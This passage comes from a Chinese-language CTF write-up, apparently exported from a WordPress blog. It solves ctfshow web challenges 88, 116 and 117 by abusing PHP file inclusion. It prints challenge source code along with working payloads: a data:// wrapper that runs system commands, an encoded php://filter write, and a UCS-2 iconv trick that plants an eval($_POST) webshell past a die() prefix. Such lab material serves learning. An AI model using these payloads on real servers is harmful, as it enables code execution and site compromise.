src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126635.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220914204712340\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6ca1\u6709\u53cd\u5e94\uff0c\u770b\u4e00\u4e0b2.php\u662f\u5426\u5199\u5165\uff01<\/p>\n<pre><code class=\"language-text\">\/2.php\n------------------------------------------\n$flag=&quot;ctfshow{c85dedf9-ae7d-4f1d-bc58-8570bfe25d3e}&quot;; *\/ # @link: https:\/\/ctfer.com # @email: h1xa@ctfer.com # @Last Modified time: 2020-09-16 11:25:00 # @Last Modified by: h1xa # @Date: 2020-09-16 11:24:37 # @Author: h1xa # -*- coding: utf-8 -*- \/*<\/code><\/pre>\n<p>\u5f97\u5230flag\uff01\uff01\uff01\uff01<\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-text\">https:\/\/www.leavesongs.com\/PENETRATION\/php-filter-magic.html \nhttps:\/\/xz.aliyun.com\/t\/8163#toc-3 \nphp:\/\/filter\/write=string.rot13\/resource=2.php\n\n%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%2\n5%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%\n33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36\n%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%3\n3%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%\n25%37%32%25%36%33%25%36%35%25%33%64%25%33%33%25%32%65%25%37%30%25%36%38%25%37%30\n\u56e0\u4e3a\u901a\u8fc7base64\u8fc7\u6ee4\u4e4b\u540e\u5c31\u53ea\u6709(phpdie)6\u4e2a\u5b57\u7b26\u6211\u4eec\u5c31\u8981\u6dfb\u52a02\u4e2a\u5b57\u7b26\u8ba9\u524d\u9762\u7684\u53ef\u4ee5\u8fdb\u884c\u7f16\u7801<\/code><\/pre>\n<h1>web88<\/h1>\n<pre><code class=\"language-php\">&lt;?php\n    if(isset($_GET[&#039;file&#039;])){\n        $file = $_GET[&#039;file&#039;];\n        if(preg_match(&quot;\/php|\\~|\\!|\\@|\\#|\\\\$|\\%|\\^|\\&amp;|\\*|\\(|\\)|\\-|\\_|\\+|\\=|\\.\/i&quot;, $file)){\n            die(&quot;error&quot;);\n        }\n        include($file);\n    }else{\n        highlight_file(__FILE__);\n    }<\/code><\/pre>\n<p>\u5229\u7528<code>data\u4f2a\u534f\u8bae<\/code>\u6784\u9020\uff1a<\/p>\n<pre><code class=\"language-php\">file=data:\/\/text\/plain;base64,&lt;?php system(&#039;tac f*.php&#039;);\nfile=data:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7<\/code><\/pre>\n<pre><code class=\"language-text\">$flag=&quot;ctfshow{0c146a77-e6ae-4d63-818d-7b4a79797c0f}&quot;; *\/ # @link: https:\/\/ctfer.com # @email: h1xa@ctfer.com # @Last Modified time: 2020-09-16 11:25:00 # @Last Modified by: h1xa # @Date: 2020-09-16 11:24:37 # @Author: h1xa # -*- coding: utf-8 -*- \/*<\/code><\/pre>\n<h2>Hint<\/h2>\n<pre><code class=\"language-text\">\u53d1\u73b0\u8fc7\u6ee4\u7684\u8fd8\u662f\u6bd4\u8f83\u591a\uff0c\u4f46\u662f\u6ca1\u6709\u8fc7\u6ee4 : \u90a3\u6211\u4eec\u5c31\u53ef\u4ee5\u4f7f\u7528PHP\u4f2a\u534f\u8bae\u5c31\u662f \u8fd9\u91cc\u4f7f\u7528\u7684\u662f data:\/\/text\/plain;base64,poc \u5176\u5b9e\u548c79\u5dee\u4e0d\u591a \u53ea\u662f\u6ce8\u610f\u7684\u662f\u7f16\u7801\u6210base64\u7684\u65f6\u5019\u8981\u53bb\u6389 \uff1d<\/code><\/pre>\n<h1>web116<\/h1>\n<pre><code class=\"language-text\">misc+lfi\nby yu22x<\/code><\/pre>\n<p>\u6253\u5f00\u73af\u5883\u4ee5\u540e\u662f\u4e00\u6bb5\u89c6\u9891\uff0c\u9898\u76ee\u90fd\u8bf4\u4e86\u6709<code>misc<\/code>\u4e86\uff0c\u90a3\u5c31\u76f4\u63a5\u4e0b\u8f7d\u4e0b\u6765\uff0c<code>foremost<\/code>\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126636.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126636.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220914213230386\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u4e00\u4e0b\u7167\u7247\uff1a<\/p>\n<div align=\"center\">\n    <div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209142133626.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209142133626.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"00080067\" style=\"zoom: 67%;\" \/><\/div>\n<\/div>\n<p>\u770b\u5230\u4f7f\u7528\u7684\u662f<code>file_get_contents($file)<\/code>\uff0c\u4f7f\u7528<code>file=flag.php<\/code>\u3002<\/p>\n<p>\u4f46\u662f\u65e0\u6cd5\u67e5\u770b\u6e90\u4ee3\u7801\uff0c<code>F12<\/code>\u4e5f\u770b\u4e0d\u5230\uff0c\u4f7f\u7528<code>view-source:<\/code>\u53ef\u4ee5\u770b\u89c1flag\uff01\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-text\">view-source:http:\/\/63d79276-a916-43e8-84c7-510bf1d5c66c.challenge.ctf.show\/?file=flag.php\n--------------------------------\n&lt;?php\n$flag=&quot;ctfshow{8f0e0913-e236-4667-a83b-d413f86888d9}&quot;;\n?&gt;<\/code><\/pre>\n<p>\u7ec8\u7aef\u4f7f\u7528<code>curl<\/code>\u4e5f\u53ef\u4ee5\u5f97\u5230\uff1a<\/p>\n<pre><code class=\"language-bash\">C:\\Users\\Administrator&gt;curl http:\/\/63d79276-a916-43e8-84c7-510bf1d5c66c.challenge.ctf.show\/?file=flag.php\n&lt;?php\n$flag=&quot;ctfshow{8f0e0913-e236-4667-a83b-d413f86888d9}&quot;;\n?&gt;<\/code><\/pre>\n<h1>web117<\/h1>\n<pre><code class=\"language-text\">by yu22x<\/code><\/pre>\n<pre><code class=\"language-php\">&lt;?php\nhighlight_file(__FILE__);\nerror_reporting(0);\nfunction filter($x){\n    if(preg_match(&#039;\/http|https|utf|zlib|data|input|rot13|base64|string|log|sess\/i&#039;,$x)){\n        die(&#039;too young too simple sometimes naive!&#039;);\n    }\n}\n$file=$_GET[&#039;file&#039;];\n$contents=$_POST[&#039;contents&#039;];\nfilter($file);\nfile_put_contents($file, &quot;&lt;?php die();?&gt;&quot;.$contents);<\/code><\/pre>\n<p>\u8fd9\u91cc\u662f\u5229\u7528PHP\u7684\u5b57\u7b26\u7f16\u7801\u8fdb\u884c\u4e86\u7b5b\u9009\uff0cwrite\u8fd9\u4e2a\u8fc7\u6ee4\u5668\u91c7\u7528<code>convert.iconv.UCS-2LE.UCS-2BE<\/code>\u8fc7\u6ee4\u6389\u4e86<code>&lt;?php die();?&gt;<\/code>\uff0c\u4ece\u800c\u5b9e\u73b0\u7ed5\u8fc7\u3002<\/p>\n<p><code>convert.iconv.UCS-2LE.UCS-2BE<\/code>\u8fd9\u4e2a\u662f\u5c06\u524d\u540e\u4e24\u4e2a\u5b57\u7b26\u8fdb\u884c\u4ea4\u66ff<code>(abcd==&gt;badc)<\/code><\/p>\n<blockquote>\n<p>\u5f53\u524d <code>mbstring<\/code> \u6a21\u5757\u652f\u6301\u4ee5\u4e0b\u7684\u5b57\u7b26\u7f16\u7801\u3002\u8fd9\u4e9b\u5b57\u7b26\u7f16\u7801\u4e2d\u7684\u4efb\u610f\u4e00\u4e2a\u90fd\u80fd\u6307\u5b9a\u5230 <code>mbstring<\/code> \u51fd\u6570\u4e2d\u7684 <code>encoding<\/code> \u53c2\u6570\u3002<\/p>\n<p>\u8be5 PHP \u6269\u5c55\u652f\u6301\u7684\u5b57\u7b26\u7f16\u7801\u6709\u4ee5\u4e0b\u51e0\u79cd\uff1a<\/p>\n<ul>\n<li>UCS-4*<\/li>\n<li>UCS-4BE<\/li>\n<li>UCS-4LE*<\/li>\n<li>UCS-2<\/li>\n<li>UCS-2BE<\/li>\n<li>UCS-2LE<\/li>\n<li>UTF-32*<\/li>\n<li>UTF-32BE*<\/li>\n<li>UTF-32LE*<\/li>\n<li>UTF-16*<\/li>\n<li>UTF-16BE*<\/li>\n<li>UTF-16LE*<\/li>\n<li>UTF-7<\/li>\n<li>UTF7-IMAP<\/li>\n<li>UTF-8*<\/li>\n<li>ASCII*<\/li>\n<li>EUC-JP*<\/li>\n<li>SJIS*<\/li>\n<li>eucJP-win*<\/li>\n<li>SJIS-win*<\/li>\n<li>ISO-2022-JP<\/li>\n<li>ISO-2022-JP-MS<\/li>\n<li>CP932<\/li>\n<li>CP51932<\/li>\n<li>SJIS-mac** (\u522b\u540d\uff1a MacJapanese)<\/li>\n<li>SJIS-Mobile#DOCOMO** (\u522b\u540d\uff1a SJIS-DOCOMO)<\/li>\n<li>SJIS-Mobile#KDDI** (\u522b\u540d\uff1a SJIS-KDDI)<\/li>\n<li>SJIS-Mobile#SOFTBANK** (\u522b\u540d\uff1a SJIS-SOFTBANK)<\/li>\n<li>UTF-8-Mobile#DOCOMO** (\u522b\u540d\uff1a UTF-8-DOCOMO)<\/li>\n<li>UTF-8-Mobile#KDDI-A**<\/li>\n<li>UTF-8-Mobile#KDDI-B** (\u522b\u540d\uff1a UTF-8-KDDI)<\/li>\n<li>UTF-8-Mobile#SOFTBANK** (\u522b\u540d\uff1a UTF-8-SOFTBANK)<\/li>\n<li>ISO-2022-JP-MOBILE#KDDI** (\u522b\u540d\uff1a ISO-2022-JP-KDDI)<\/li>\n<li>JIS<\/li>\n<li>JIS-ms<\/li>\n<li>CP50220<\/li>\n<li>CP50220raw<\/li>\n<li>CP50221<\/li>\n<li>CP50222<\/li>\n<li>ISO-8859-1*<\/li>\n<li>ISO-8859-2*<\/li>\n<li>ISO-8859-3*<\/li>\n<li>ISO-8859-4*<\/li>\n<li>ISO-8859-5*<\/li>\n<li>ISO-8859-6*<\/li>\n<li>ISO-8859-7*<\/li>\n<li>ISO-8859-8*<\/li>\n<li>ISO-8859-9*<\/li>\n<li>ISO-8859-10*<\/li>\n<li>ISO-8859-13*<\/li>\n<li>ISO-8859-14*<\/li>\n<li>ISO-8859-15*<\/li>\n<li>ISO-8859-16*<\/li>\n<li>byte2be<\/li>\n<li>byte2le<\/li>\n<li>byte4be<\/li>\n<li>byte4le<\/li>\n<li>BASE64<\/li>\n<li>HTML-ENTITIES<\/li>\n<li>7bit<\/li>\n<li>8bit<\/li>\n<li>EUC-CN*<\/li>\n<li>CP936<\/li>\n<li>GB18030**<\/li>\n<li>HZ<\/li>\n<li>EUC-TW*<\/li>\n<li>CP950<\/li>\n<li>BIG-5*<\/li>\n<li>EUC-KR*<\/li>\n<li>UHC (CP949)<\/li>\n<li>ISO-2022-KR<\/li>\n<li>Windows-1251 (CP1251)<\/li>\n<li>Windows-1252 (CP1252)<\/li>\n<li>CP866 (IBM866)<\/li>\n<li>KOI8-R*<\/li>\n<li>KOI8-U*<\/li>\n<li>ArmSCII-8 (ArmSCII8)<\/li>\n<\/ul>\n<p>* \u8868\u793a\u8be5\u7f16\u7801\u4e5f\u53ef\u4ee5\u5728\u6b63\u5219\u8868\u8fbe\u5f0f\u4e2d\u4f7f\u7528\u3002<\/p>\n<p>** \u8868\u793a\u8be5\u7f16\u7801\u81ea PHP 5.4.0 \u59cb\u53ef\u7528\u3002<\/p>\n<\/blockquote>\n<pre><code class=\"language-php\">payload: \/?file=php:\/\/filter\/write=convert.iconv.UCS-2LE.UCS-2BE\/resource=a.php \npost:contents=?&lt;hp pvela$(P_SO[T]1;)&gt;?<\/code><\/pre>\n<p>\u518d\u8bbf\u95ee<code>a.php<\/code><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126638.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126638.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220914221426673\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5f97\u5230flag\uff01\uff01\uff01\uff01<\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">payload: file=php:\/\/filter\/write=convert.iconv.UCS-2LE.UCS-2BE\/resource=a.php post:contents=?&lt;hp pvela$(P_SO[T]1;)&gt;?<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>web78 \u6b64\u9898\u4e3a \u3010\u4ece0\u5f00\u59cb\u5b66web\u3011\u7cfb\u5217\u7b2c\u4e03\u5341\u516b\u9898 \u6b64\u7cfb\u5217\u9898\u76ee\u4ece\u6700\u57fa\u7840\u5f00\u59cb\uff0c\u9898\u76ee\u9075\u5faa\u5faa\u5e8f\u6e10\u8fdb\u7684\u539f\u5219 \u5e0c\u671b\u5bf9 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":279,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-278","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/278","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=278"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/278\/revisions"}],"predecessor-version":[{"id":280,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/278\/revisions\/280"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media\/279"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=278"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=278"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=278"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}